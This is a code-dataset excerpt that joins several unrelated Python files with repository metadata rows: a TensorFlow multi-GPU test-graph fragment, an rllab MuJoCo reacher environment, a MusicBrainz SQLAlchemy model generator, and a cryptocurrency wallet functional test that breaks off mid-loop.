assert len(batch_data) == len(self._input_list[0]), "Input data is incomplete."
batch_size = self.cfg.batch_size
if self._input_list[0][0].get_shape().as_list()[0] is None:
# fill batch
for i in range(len(batch_data)):
batch_size = (len(batch_data[i]) + self.cfg.num_gpus - 1) // self.cfg.num_gpus
total_batches = batch_size * self.cfg.num_gpus
left_batches = total_batches - len(batch_data[i])
if left_batches > 0:
batch_data[i] = np.append(batch_data[i], np.zeros((left_batches, *batch_data[i].shape[1:])), axis=0)
self.logger.warning("Fill some blanks to fit batch_size which wastes %d%% computation" % (
left_batches * 100. / total_batches))
else:
assert self.cfg.batch_size * self.cfg.num_gpus == len(batch_data[0]), \
"Input batch doesn't fit placeholder batch."
for j, inputs in enumerate(self._input_list):
for i, inp in enumerate(inputs):
feed_dict[ inp ] = batch_data[i][j * batch_size: (j+1) * batch_size]
#@TODO(delete)
assert (j+1) * batch_size == len(batch_data[0]), 'check batch'
return feed_dict, batch_size
def _make_graph(self):
self.logger.info("Generating testing graph on {} GPUs ...".format(self.cfg.num_gpus))
with tf.variable_scope(tf.get_variable_scope()):
for i in range(self.cfg.num_gpus):
with tf.device('/cpu:0'):
with tf.name_scope('tower_%d' % i) as name_scope:
with slim.arg_scope([slim.model_variable, slim.variable], device='/device:CPU:0'):
self.net.make_network(is_train=False)
self._input_list.append(self.net.get_inputs())
self._output_list.append(self.net.get_outputs())
tf.get_variable_scope().reuse_variables()
self._outputs = aggregate_batch(self._output_list)
# run_meta = tf.RunMetadata()
# opts = tf.profiler.ProfileOptionBuilder.float_operation()
# flops = tf.profiler.profile(self.sess.graph, run_meta=run_meta, cmd='op', options=opts)
#
# opts = tf.profiler.ProfileOptionBuilder.trainable_variables_parameter()
# params = tf.profiler.profile(self.sess.graph, run_meta=run_meta, cmd='op', options=opts)
# print("{:,} --- {:,}".format(flops.total_float_ops, params.total_parameters))
# from IPython import embed; embed()
return self._outputs
def predict_one(self, data=None):
# TODO(reduce data in limited batch)
assert len(self.summary_dict) == 0, "still not support scalar summary in testing stage"
setproctitle.setproctitle('test epoch:' + str(self.cur_epoch))
self.read_timer.tic()
feed_dict, batch_size = self.next_feed(data)
self.read_timer.toc()
self.gpu_timer.tic()
res = self.sess.run([*self.graph_ops, *self.summary_dict.values()], feed_dict=feed_dict)
self.gpu_timer.toc()
if data is not None and len(data[0]) < self.cfg.num_gpus * batch_size:
for i in range(len(res)):
res[i] = res[i][:len(data[0])]
return res
def test(self):
pass
| 40.93049 | 124 | 0.569416 |
4a22583d63596ec8b6e4c7edb5fd76a3870d6ce5 | 2,557 | py | Python | sandbox/bradly/third_person/envs/reacher.py | leopauly/Observation-Learning-Simulations | 462c04a87c45aae51537b8ea5b44646afa31d3a5 | [
"MIT"
] | 81 | 2016-11-21T03:27:16.000Z | 2021-10-04T02:07:07.000Z | sandbox/bradly/third_person/envs/reacher.py | leopauly/Observation-Learning-Simulations | 462c04a87c45aae51537b8ea5b44646afa31d3a5 | [
"MIT"
] | 2 | 2018-01-01T17:39:56.000Z | 2019-07-24T04:49:08.000Z | sandbox/bradly/third_person/envs/reacher.py | leopauly/Observation-Learning-Simulations | 462c04a87c45aae51537b8ea5b44646afa31d3a5 | [
"MIT"
] | 21 | 2016-11-29T08:59:10.000Z | 2020-08-13T11:24:57.000Z | from rllab.envs.base import Step
from rllab.core.serializable import Serializable
import numpy as np
from rllab.envs.mujoco.mujoco_env import MujocoEnv
from rllab.mujoco_py import MjViewer
class ReacherEnv(MujocoEnv, Serializable):
FILE = 'reacher.xml'
def __init__(self, *args, **kwargs):
super(ReacherEnv, self).__init__(*args, **kwargs)
Serializable.quick_init(self, locals())
self.goal = None
def step(self, a):
#print(self.viewer.cam.__dict__)
#print(self.viewer.cam.distance)
#print(self.viewer.cam.azimuth)
#print(self.viewer.cam.elevation)
vec = self.get_body_com("fingertip")-self.get_body_com("target")
reward_dist = - np.linalg.norm(vec)
reward_ctrl = 0 #- np.square(a).sum()
#reward_close = 0.01*math.log(-reward_dist)
reward = reward_dist + reward_ctrl #+ reward_close
self.forward_dynamics(a)
next_obs = self.get_current_obs()
return Step(next_obs, reward, False)
#done = False
#return ob, reward, done, dict(reward_dist=reward_dist, reward_ctrl=reward_ctrl)
def viewer_setup(self):
self.viewer.cam.trackbodyid=0
def get_viewer(self):
if self.viewer is None:
self.viewer = MjViewer(init_width=25, init_height=25)
self.viewer.start()
self.viewer.set_model(self.model)
self.viewer.cam.elevation = -20.59999990463257
return self.viewer
def reset_mujoco(self, init_state=None):
qpos = np.random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos.flat
#while True:
# self.goal = np.random.uniform(low=-.2, high=.2, size=2)
# if np.linalg.norm(self.goal) < 2: break
self.goal = np.array([0.1, 0.1])
qpos[-2:] = self.goal
qvel = self.init_qvel.flat + np.random.uniform(low=-.005, high=.005, size=self.model.nv)
qvel[-2:] = 0
self.model.data.qpos = qpos
self.model.data.qvel = qvel
self.model.data.qacc = self.init_qacc
self.model.data.ctrl = self.init_ctrl
return self.get_current_obs()
def get_current_obs(self):
theta = self.model.data.qpos.flat[:2]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.model.data.qpos.flat[2:],
self.model.data.qvel.flat[:2],
self.get_body_com("fingertip") - self.get_body_com("target")
])
reset_trial = reset_mujoco # shortcut for compatibility.
| 36.014085 | 96 | 0.626124 |
4a22586bd6d4f40838214208cd261632d1d5f227 | 22,617 | py | Python | mbdata/tools/genmodels.py | acoustid/mbdata | bbe303865e4cec3f83a65ce29f0d3468c729173e | [
"MIT"
] | 3 | 2022-01-30T09:38:16.000Z | 2022-03-04T10:35:32.000Z | mbdata/tools/genmodels.py | acoustid/mbdata | bbe303865e4cec3f83a65ce29f0d3468c729173e | [
"MIT"
] | 5 | 2022-01-09T22:19:09.000Z | 2022-03-27T13:41:54.000Z | mbdata/tools/genmodels.py | acoustid/mbdata | bbe303865e4cec3f83a65ce29f0d3468c729173e | [
"MIT"
] | 2 | 2022-01-18T03:01:39.000Z | 2022-02-19T18:15:59.000Z | # Copyright (C) 2013 Lukas Lalinsky
# Distributed under the MIT license, see the LICENSE file for details.
from __future__ import print_function
import os
import re
import sqlparse
import six
import sys
from sqlparse import tokens as T
from sqlparse.sql import TokenList, Parenthesis
from typing import List
from mbdata.utils.sql import CreateTable, CreateType, CreateIndex, Set, parse_statements
ACRONYMS = set(['ipi', 'isni', 'gid', 'url', 'iso', 'isrc', 'iswc', 'cdtoc'])
SPECIAL_NAMES = {'coverart': 'CoverArt'}
TYPE_MAPPING = {
'SERIAL': 'Integer',
'INT': 'Integer',
'INTEGER': 'Integer',
'TEXT': 'String',
'VARCHAR': 'String',
'CHAR': 'CHAR',
'CHARACTER': 'CHAR',
'TIMESTAMP': 'DateTime',
'TIMESTAMPTZ': 'DateTime(timezone=True)',
'TIMESTAMP WITH TIME ZONE': 'DateTime(timezone=True)',
'TIME WITHOUT TIME ZONE': 'Time(timezone=False)',
'DATE': 'Date',
'UUID': 'UUID',
'SMALLINT': 'SMALLINT',
'BIGINT': 'BIGINT',
'BOOLEAN': 'Boolean',
'INTERVAL': 'Interval',
'POINT': 'Point',
'CUBE': 'Cube',
'JSONB': 'JSONB',
}
def capitalize(word):
if word in ACRONYMS:
return word.upper()
return SPECIAL_NAMES.get(word, word.title())
def format_model_name(table_name):
words = list(table_name.split('_'))
if words[0] == 'l':
words[0] = 'link'
return str(''.join([capitalize(word) for word in words]))
class CheckConstraint(object):
def __init__(self, text, name=None):
self.text = text
self.name = name
class ForeignKey(object):
def __init__(self, schema, table, column, cascade=False):
self.schema = schema
self.table = table
self.column = column
self.cascade = cascade
class Column(object):
def __init__(self, name, type, nullable=True, default=None, primary_key=False, foreign_key=None, check_constraint=None):
self.name = name
self.type = type
self.nullable = nullable
self.default = default
self.primary_key = primary_key
self.foreign_key = foreign_key
self.check_constraint = check_constraint
class Table(object):
def __init__(self, schema, name, columns):
self.schema = schema
self.name = name
self.columns = columns
class Enum(object):
def __init__(self, schema, name, labels):
self.schema = schema
self.name = name
self.labels = labels
class Index(object):
def __init__(self, schema, name, table, columns, unique):
self.schema = schema
self.name = name
self.table = table
self.columns = columns
self.unique = unique
def split_fqn(fqn, schema=None):
parts = fqn.split('.')
if len(parts) == 1:
return schema, parts[0], 'id' # XXX this shouldn't happen, but there are errors in CreateTables.sql
elif len(parts) == 2:
return schema, parts[0], parts[1]
elif len(parts) == 3:
return parts[0], parts[1], parts[2]
raise ValueError('invalid name {0}'.format(fqn))
def parse_create_table_column(clause, schema):
column = Column(clause.get_name(), clause.get_type())
if clause.is_not_null():
column.nullable = False
column.default = clause.get_default_value()
if column.type == 'SERIAL':
column.primary_key = True
for comment in clause.get_comments():
if re.search(r'\bPK\b', comment):
column.primary_key = True
match = re.search(r'\b(?:(weakly)\s+)?references\s+([a-z0-9_.]+)(?:\s(CASCADE))?', comment)
if match is not None and match.group(1) != 'weakly':
column.foreign_key = ForeignKey(*split_fqn(match.group(2), schema))
if match.group(3) == 'CASCADE':
column.foreign_key.cascade = True
check = clause.get_check_constraint()
if check is not None:
column.check_constraint = CheckConstraint(check.get_body(), check.get_name())
return column
def parse_create_table(statement, schema):
table = Table(schema, statement.get_name(), [])
for column_clause in statement.get_columns():
table.columns.append(parse_create_table_column(column_clause, schema))
return table
def parse_create_type(statement, schema):
return Enum(schema, statement.get_name(), statement.get_enum_labels())
def parse_create_index(statement, schema):
return Index(schema, statement.get_name(), statement.get_table(), statement.get_columns(), unique=statement.is_unique())
def parse_sql(sql, schema='musicbrainz'):
tables = []
types = []
indexes = []
statements = parse_statements(sqlparse.parse(sql))
for statement in statements:
if isinstance(statement, Set) and statement.get_name() == 'search_path':
schema = statement.get_value().split(',')[0].strip()
elif isinstance(statement, CreateTable):
if not statement.is_partition_of():
tables.append(parse_create_table(statement, schema))
elif isinstance(statement, CreateType):
types.append(parse_create_type(statement, schema))
elif isinstance(statement, CreateIndex):
indexes.append(parse_create_index(statement, schema))
return tables, types, indexes
def join_foreign_key(*args):
return '.'.join(map(str, args))
def generate_models_header():
yield '# Automatically generated, do not edit'
yield ''
yield '# pylint: disable=C0103'
yield '# pylint: disable=C0302'
yield '# pylint: disable=W0232'
yield ''
yield 'from sqlalchemy import Column, Index, Integer, String, Text, ForeignKey, Boolean, DateTime, Time, Date, Enum, Interval, CHAR, CheckConstraint, sql'
yield 'from sqlalchemy.ext.declarative import declarative_base'
yield 'from sqlalchemy.ext.hybrid import hybrid_property'
yield 'from sqlalchemy.orm import relationship, composite, backref'
yield 'from mbdata.types import PartialDate, Point, Cube as _Cube, regexp, UUID, SMALLINT, BIGINT, JSONB'
yield 'from typing import Any, Union'
yield ''
yield 'import mbdata.config'
yield 'mbdata.config.freeze()'
yield ''
yield 'Base = None # type: Any'
yield ''
yield 'if mbdata.config.Base is not None:'
yield ' Base = mbdata.config.Base'
yield 'elif mbdata.config.metadata is not None:'
yield ' Base = declarative_base(metadata=mbdata.config.metadata)'
yield 'else:'
yield ' Base = declarative_base()'
yield ''
yield 'if mbdata.config.use_cube:'
yield ' Cube = _Cube # type: Union[_Cube, Text]'
yield 'else:'
yield ' Cube = Text'
yield ''
yield ''
yield 'def apply_schema(name, schema):'
yield ' schema = mbdata.config.schemas.get(schema, schema)'
yield ' if schema:'
yield ' name = "{}.{}".format(schema, name)'
yield ' return name'
yield ''
yield ''
def make_type_mapper(types):
mapping = dict(TYPE_MAPPING)
for type in types:
mapping[type.name.upper()] = 'Enum({0}, name={1!r}, schema=mbdata.config.schemas.get({2!r}, {2!r}))'.format(', '.join(('{0!r}'.format(str(label)) for label in type.labels)), str(type.name.upper()), type.schema)
def inner(type):
new_type = mapping.get(type.upper())
if new_type is not None:
return new_type
match = re.match(r'(\w+)\((\d+)\)', type)
if match is not None:
name, precision = match.groups()
new_type = mapping.get(name.upper())
if new_type is not None:
return '{0}({1})'.format(new_type, precision)
raise ValueError('unknown type - ' + type)
return inner
def convert_expression_to_python(token):
if not token.is_group:
if token.value.upper() == 'TRUE':
return 'sql.true()'
elif token.value.upper() == 'FALSE':
return 'sql.false()'
elif token.ttype == T.Name:
return 'sql.literal_column({0!r})'.format(str(token.value))
else:
return 'sql.text({0!r})'.format(str(token.value))
if isinstance(token, Parenthesis):
return '({0})'.format(convert_expression_to_python(TokenList(token.tokens[1:-1])))
elif len(token.tokens) == 1:
return convert_expression_to_python(token.tokens[0])
elif len(token.tokens) == 3 and token.tokens[1].ttype == T.Comparison:
lhs = convert_expression_to_python(token.tokens[0])
rhs = convert_expression_to_python(token.tokens[2])
op = token.tokens[1].value
if op == '=':
op = '=='
return '{0} {1} {2}'.format(lhs, op, rhs)
elif len(token.tokens) == 3 and token.tokens[1].match(T.Keyword, 'IN') and isinstance(token.tokens[2], Parenthesis):
lhs = convert_expression_to_python(token.tokens[0])
rhs = [convert_expression_to_python(t) for t in token.tokens[2].tokens[1:-1] if not t.match(T.Punctuation, ',')]
return '{0}.in_({1!r})'.format(lhs, tuple(rhs))
elif len(token.tokens) == 4 and token.tokens[1].match(T.Comparison, '~') and token.tokens[2].match(T.Name, 'E') and token.tokens[3].ttype == T.String.Single:
lhs = convert_expression_to_python(token.tokens[0])
pattern = token.tokens[3].value.replace('\\\\', '\\')
return 'regexp({0}, {1})'.format(lhs, pattern)
elif len(token.tokens) == 3 and token.tokens[1].match(T.Keyword, 'IS') and token.tokens[2].match(T.Keyword, 'NULL'):
lhs = convert_expression_to_python(token.tokens[0])
return '{0} == None'.format(lhs)
elif len(token.tokens) == 3 and token.tokens[1].match(T.Keyword, 'IS') and token.tokens[2].match(T.Keyword, 'NOT NULL'):
lhs = convert_expression_to_python(token.tokens[0])
return '{0} != None'.format(lhs)
else:
parts = []
op = None
idx = -1
while True:
new_idx, op_token = token.token_next_by(m=(T.Keyword, ('AND', 'OR')), idx=idx)
if op_token is None:
break
if op is None:
op = op_token.normalized
assert op == op_token.normalized
new_tokens = token.tokens[idx + 1:new_idx]
if len(new_tokens) == 1:
parts.append(convert_expression_to_python(new_tokens[0]))
else:
parts.append(convert_expression_to_python(TokenList(new_tokens)))
idx = new_idx + 1
if idx == -1:
raise ValueError('unknown expression - {0}'.format(token))
new_tokens = token.tokens[idx:]
if len(new_tokens) == 1:
parts.append(convert_expression_to_python(new_tokens[0]))
else:
parts.append(convert_expression_to_python(TokenList(new_tokens)))
return 'sql.{0}_({1})'.format(op.lower(), ', '.join(parts))
def generate_models_from_sql(tables, types, indexes):
map_type = make_type_mapper(types)
for table in tables:
if table.name == 'old_editor_name':
continue
if table.name == 'artist_release':
for column in table.columns:
if column.name in {'artist', 'release'}:
column.primary_key = True
if table.name == 'artist_release_group':
for column in table.columns:
if column.name in {'artist', 'release_group'}:
column.primary_key = True
model_name = format_model_name(table.name)
yield 'class {0}(Base):'.format(model_name)
yield ' __tablename__ = {0!r}'.format(str(table.name))
yield ' __table_args__ = ('
for index in indexes:
if index.table == table.name and index.schema == table.schema:
extra = ['{!r}'.format(str(column)) for column in index.columns]
if index.unique:
extra.append('unique=True')
extra = ', '.join([repr(str(index.name))] + extra)
if 'DESC' not in extra and '(' not in extra: # XXX fix
yield ' Index({}),'.format(extra)
yield ' {{\'schema\': mbdata.config.schemas.get({0!r}, {0!r})}}'.format(str(table.schema))
yield ' )'
yield ''
composites = []
aliases = []
foreign_keys = []
for column in table.columns:
column_type = map_type(column.type)
column_attributes = {}
if column.name.endswith('date_year'):
composites.append((
column.name.replace('_year', ''),
'PartialDate',
(column.name,
column.name.replace('_year', '_month'),
column.name.replace('_year', '_day'))
))
if table.name.endswith('_first_release_date') and column.name == 'year':
composites.append((
'date',
'PartialDate',
(column.name,
'month',
'day')
))
attribute_name = column.name
params = [column_type]
if table.schema == 'cover_art_archive' and table.name == 'cover_art_type' and column.name == 'type_id':
attribute_name = 'type'
if table.schema == 'musicbrainz' and table.name.endswith('_gid_redirect') and column.name == 'new_id':
attribute_name = 'redirect'
foreign_key = column.foreign_key
if foreign_key is not None:
if foreign_key.column in ('id', 'area'):
backref = None
if table.schema == 'musicbrainz' and table.name == 'artist_credit_name' and column.name == 'artist_credit':
backref = 'artists', 'order_by="ArtistCreditName.position"'
if table.schema == 'musicbrainz' and table.name == 'track' and column.name == 'medium':
backref = 'tracks', 'order_by="Track.position"'
if table.schema == 'musicbrainz' and table.name == 'track' and column.name == 'recording':
backref = 'tracks'
if table.schema == 'musicbrainz' and table.name == 'medium' and column.name == 'release':
backref = 'mediums', 'order_by="Medium.position"'
if table.schema == 'musicbrainz' and table.name == 'isrc' and column.name == 'recording':
backref = 'isrcs'
if table.schema == 'musicbrainz' and table.name == 'iswc' and column.name == 'work':
backref = 'iswcs'
if table.schema == 'musicbrainz' and table.name == 'artist_ipi' and column.name == 'artist':
backref = 'ipis'
if table.schema == 'musicbrainz' and table.name == 'artist_isni' and column.name == 'artist':
backref = 'isnis'
if table.schema == 'musicbrainz' and table.name == 'label_ipi' and column.name == 'label':
backref = 'ipis'
if table.schema == 'musicbrainz' and table.name == 'label_isni' and column.name == 'label':
backref = 'isnis'
if table.schema == 'musicbrainz' and table.name == 'release_label' and column.name == 'release':
backref = 'labels'
if table.schema == 'musicbrainz' and table.name == 'release_country' and column.name == 'release':
backref = 'country_dates'
if table.schema == 'musicbrainz' and table.name == 'release_unknown_country' and column.name == 'release':
backref = 'unknown_country_dates'
if table.schema == 'musicbrainz' and table.name == 'release_group_secondary_type_join' and column.name == 'release_group':
backref = 'secondary_types'
if table.schema == 'musicbrainz' and table.name.endswith('_first_release_date') and column.name in ('recording', 'release'):
backref = 'first_release', 'uselist=False'
if table.schema == 'musicbrainz' and table.name.endswith('_meta') and column.name == 'id':
backref = 'meta', 'uselist=False'
if table.schema == 'musicbrainz' and table.name.startswith('iso_') and column.name == 'area':
backref = table.name + '_codes'
if attribute_name == 'id':
if table.schema == 'cover_art_archive' and table.name == 'cover_art_type':
relationship_name = 'cover_art'
elif table.schema == 'documentation' and table.name.startswith('l_') and table.name.endswith('_example'):
relationship_name = 'link'
else:
relationship_name = foreign_key.table
else:
relationship_name = attribute_name
attribute_name += '_id'
params.insert(0, repr(str(column.name)))
foreign_keys.append((attribute_name, relationship_name, foreign_key, backref, column.nullable))
if table.name.startswith('l_') and column.name in ('entity0', 'entity1'):
if table.name == 'l_{0}_{0}'.format(foreign_key.table):
aliases.append((column.name, foreign_key.table + column.name[-1]))
aliases.append((attribute_name, foreign_key.table + column.name[-1] + '_id'))
else:
aliases.append((column.name, foreign_key.table))
aliases.append((attribute_name, foreign_key.table + '_id'))
if table.name.endswith('_gid_redirect') and column.name == 'new_id':
aliases.append((attribute_name, column.name))
aliases.append((relationship_name, foreign_key.table))
foreign_key_name = "{0}_fk_{1}".format(table.name, column.name)[:63]
foreign_key_params = [
"apply_schema({0!r}, {1!r})".format(join_foreign_key(foreign_key.table, foreign_key.column), foreign_key.schema),
"name='{0}'".format(foreign_key_name),
]
if foreign_key.cascade:
foreign_key_params.append("ondelete='CASCADE'")
params.append('ForeignKey({0})'.format(', '.join(foreign_key_params)))
if not column.nullable:
column_attributes['nullable'] = 'False'
if column.primary_key:
column_attributes['primary_key'] = 'True'
if column.default:
default = str(column.default.lower())
if default != "null":
if default in ("-1", "0", "1") or (default[0] == "'" and default[-1] == "'"):
column_attributes['default'] = default
elif default in ("true", "false"):
column_attributes['default'] = default.title()
if default == "now()":
column_attributes['server_default'] = 'sql.func.now()'
elif default in ("true", "false"):
column_attributes['server_default'] = 'sql.{0}()'.format(default)
else:
column_attributes['server_default'] = 'sql.text({0!r})'.format(default)
# if column.check_constraint:
# check = column.check_constraint
# text = convert_expression_to_python(check.text)
# if check.name:
# params.append('CheckConstraint({0}, name={1!r})'.format(str(text), str(check.name)))
# else:
# params.append('CheckConstraint({0})'.format(str(text)))
for name, value in column_attributes.items():
params.append('{0}={1}'.format(name, value))
yield ' {0} = Column({1})'.format(attribute_name, ', '.join(params))
if foreign_keys:
yield ''
for attribute_name, relationship_name, foreign_key, backref, nullable in foreign_keys:
foreign_model_name = format_model_name(foreign_key.table)
relationship_params = [
repr(foreign_model_name),
'foreign_keys=[{0}]'.format(attribute_name)
]
if not nullable:
relationship_params.append('innerjoin=True')
if backref:
if isinstance(backref, six.string_types):
relationship_params.append('backref=backref({0!r})'.format(backref))
else:
relationship_params.append('backref=backref({0!r}, {1})'.format(backref[0], ', '.join(backref[1:])))
yield ' {0} = relationship({1})'.format(relationship_name, ', '.join(relationship_params))
for old_name, new_name in aliases:
yield ''
yield ' @hybrid_property'
yield ' def {0}(self):'.format(new_name)
yield ' return self.{0}'.format(old_name)
if composites:
yield ''
for name, type, columns in composites:
yield ' {0} = composite({1}, {2})'.format(name, type, ', '.join(columns))
yield ''
yield ''
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('sql', nargs='+')
args = parser.parse_args()
for line in generate_models_header():
print(line)
tables = [] # type: List[CreateTable]
types = [] # type: List[CreateType]
indexes = [] # type: List[CreateIndex]
for file_name in args.sql:
file_names = [file_name]
indexes_file_name = file_name.replace('CreateTables', 'CreateIndexes')
if os.path.exists(indexes_file_name):
file_names.append(indexes_file_name)
for file_name in file_names:
with open(file_name, 'r') as file:
sql = file.read()
tables2, types2, indexes2 = parse_sql(sql)
tables.extend(tables2)
types.extend(types2)
indexes.extend(indexes2)
for line in generate_models_from_sql(tables, types, indexes):
print(line)
| 40.678058 | 218 | 0.572401 |
4a225982af231461df5dfc017bd675af50f8888b | 14,379 | py | Python | test/functional/wallet_basic.py | robinadaptor/chronon | 630b3945824c1b1cd2ea67ca80835a9f669b9124 | [
"MIT"
] | null | null | null | test/functional/wallet_basic.py | robinadaptor/chronon | 630b3945824c1b1cd2ea67ca80835a9f669b9124 | [
"MIT"
] | null | null | null | test/functional/wallet_basic.py | robinadaptor/chronon | 630b3945824c1b1cd2ea67ca80835a9f669b9124 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2017 Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class WalletTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
def setup_network(self):
self.add_nodes(4)
self.start_node(0)
self.start_node(1)
self.start_node(2)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.sync_all([self.nodes[0:3]])
def check_fee_amount(self, curr_balance, balance_with_fee, fee_per_byte, tx_size):
"""Return curr_balance after asserting the fee was in range"""
fee = balance_with_fee - curr_balance
fee2 = round(tx_size * fee_per_byte / 1000, 8)
self.log.info("current: %s, withfee: %s, perByte: %s, size: %s, fee: %s" % (str(curr_balance), str(balance_with_fee), str(fee_per_byte), str(tx_size), str(fee2)))
assert_fee_amount(fee, tx_size, fee_per_byte * 1000)
return curr_balance
def get_vsize(self, txn):
return self.nodes[0].decoderawtransaction(txn)['size']
def run_test(self):
# Check that there's no UTXO on none of the nodes
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
assert_equal(len(self.nodes[2].listunspent()), 0)
self.log.info("Mining blocks...")
self.nodes[0].generate(1)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 250)
assert_equal(walletinfo['balance'], 0)
self.sync_all([self.nodes[0:3]])
self.nodes[1].generate(101)
self.sync_all([self.nodes[0:3]])
assert_equal(self.nodes[0].getbalance(), 250)
assert_equal(self.nodes[1].getbalance(), 250)
assert_equal(self.nodes[2].getbalance(), 0)
# Check that only first and second nodes have UTXOs
utxos = self.nodes[0].listunspent()
assert_equal(len(utxos), 1)
assert_equal(len(self.nodes[1].listunspent()), 1)
assert_equal(len(self.nodes[2].listunspent()), 0)
# Send 21 BTC from 0 to 2 using sendtoaddress call.
# Second transaction will be child of first, and will require a fee
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 21)
#self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 10)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 0)
# Have node0 mine a block, thus it will collect its own fee.
self.nodes[0].generate(1)
self.sync_all([self.nodes[0:3]])
# Exercise locking of unspent outputs
unspent_0 = self.nodes[2].listunspent()[0]
unspent_0 = {"txid": unspent_0["txid"], "vout": unspent_0["vout"]}
self.nodes[2].lockunspent(False, [unspent_0])
assert_raises_rpc_error(-4, "Insufficient funds", self.nodes[2].sendtoaddress, self.nodes[2].getnewaddress(), 20)
assert_equal([unspent_0], self.nodes[2].listlockunspent())
self.nodes[2].lockunspent(True, [unspent_0])
assert_equal(len(self.nodes[2].listlockunspent()), 0)
# Have node1 generate 100 blocks (so node0 can recover the fee)
self.nodes[1].generate(100)
self.sync_all([self.nodes[0:3]])
# node0 should end up with 100 btc in block rewards plus fees, but
# minus the 21 plus fees sent to node2
assert_equal(self.nodes[0].getbalance(), 500-21)
assert_equal(self.nodes[2].getbalance(), 21)
# Node0 should have two unspent outputs.
# Create a couple of transactions to send them to node2, submit them through
# node1, and make sure both node0 and node2 pick them up properly:
node0utxos = self.nodes[0].listunspent(1)
assert_equal(len(node0utxos), 2)
# create both transactions
txns_to_send = []
for utxo in node0utxos:
inputs = []
outputs = {}
inputs.append({ "txid" : utxo["txid"], "vout" : utxo["vout"]})
outputs[self.nodes[2].getnewaddress("from1")] = float(utxo["amount"])
raw_tx = self.nodes[0].createrawtransaction(inputs, outputs)
txns_to_send.append(self.nodes[0].signrawtransaction(raw_tx))
# Have node 1 (miner) send the transactions
self.nodes[1].sendrawtransaction(txns_to_send[0]["hex"], True)
self.nodes[1].sendrawtransaction(txns_to_send[1]["hex"], True)
# Have node1 mine a block to confirm transactions:
self.nodes[1].generate(1)
self.sync_all([self.nodes[0:3]])
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 500)
assert_equal(self.nodes[2].getbalance("from1"), 500-21)
# Send 10 BTC normal
address = self.nodes[0].getnewaddress("test")
fee_per_byte = Decimal('0.001') / 1000
self.nodes[2].settxfee(float(fee_per_byte * 1000))
txid = self.nodes[2].sendtoaddress(address, 10, "", "")
fee = self.nodes[2].gettransaction(txid)["fee"]
self.nodes[2].generate(1)
self.sync_all([self.nodes[0:3]])
node_2_bal = self.nodes[2].getbalance()
#node_2_bal = self.check_fee_amount(balance, Decimal(balance - fee), fee_per_byte, self.get_vsize(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), Decimal('10'))
# Send 10 BTC with subtract fee from amount
txid = self.nodes[2].sendtoaddress(address, 10, "", "")
self.nodes[2].generate(1)
self.sync_all([self.nodes[0:3]])
node_2_bal -= Decimal('10')
assert_equal(self.nodes[2].getbalance() - fee, node_2_bal)
node_0_bal = self.nodes[0].getbalance()
assert_equal(node_0_bal, Decimal('20'))
# Sendmany 10 BTC
txid = self.nodes[2].sendmany('from1', {address: 10}, 0, "")
self.nodes[2].generate(1)
self.sync_all([self.nodes[0:3]])
node_0_bal += Decimal('10')
node_2_bal -= Decimal('10')
#node_2_bal = self.check_fee_amount(self.nodes[2].getbalance(), node_2_bal - Decimal('10'), fee_per_byte, self.get_vsize(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), node_0_bal)
# Sendmany 10 BTC with subtract fee from amount
txid = self.nodes[2].sendmany('from1', {address: 10}, 0, "")
self.nodes[2].generate(1)
self.sync_all([self.nodes[0:3]])
node_2_bal -= Decimal('10')
assert_equal(self.nodes[2].getbalance(), node_2_bal + (fee * 3))
#node_0_bal = self.check_fee_amount(self.nodes[0].getbalance(), node_0_bal + Decimal('10'), fee_per_byte, self.get_vsize(self.nodes[2].getrawtransaction(txid)))
# Test ResendWalletTransactions:
# Create a couple of transactions, then start up a fourth
# node (nodes[3]) and ask nodes[0] to rebroadcast.
# EXPECT: nodes[3] should have those transactions in its mempool.
txid1 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1)
txid2 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1)
sync_mempools(self.nodes[0:2])
self.start_node(3)
connect_nodes_bi(self.nodes, 0, 3)
sync_blocks(self.nodes)
#relayed = self.nodes[0].resendwallettransactions()
#assert_equal(set(relayed), {txid1, txid2})
#sync_mempools(self.nodes)
#assert(txid1 in self.nodes[3].getrawmempool())
# Exercise balance rpcs
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], 1)
assert_equal(self.nodes[0].getunconfirmedbalance(), 1)
#check if we can list zero value tx as available coins
#1. create rawtx
#2. hex-changed one output to 0.0
#3. sign and send
#4. check if recipient (node0) can list the zero value tx
usp = self.nodes[1].listunspent()
inputs = [{"txid":usp[0]['txid'], "vout":usp[0]['vout']}]
outputs = {self.nodes[1].getnewaddress(): 49.998, self.nodes[0].getnewaddress(): 11.11}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs).replace("c0833842", "00000000") #replace 11.11 with 0.0 (int32)
decRawTx = self.nodes[1].decoderawtransaction(rawTx)
signedRawTx = self.nodes[1].signrawtransaction(rawTx)
decRawTx = self.nodes[1].decoderawtransaction(signedRawTx['hex'])
zeroValueTxid= decRawTx['txid']
assert_raises_rpc_error(-25, "", self.nodes[1].sendrawtransaction, signedRawTx['hex'])
self.sync_all([self.nodes[0:3]])
self.nodes[1].generate(1) #mine a block
self.sync_all([self.nodes[0:3]])
#unspentTxs = self.nodes[0].listunspent() #zero value tx must be in listunspents output
#found = False
#for uTx in unspentTxs:
# if uTx['txid'] == zeroValueTxid:
# found = True
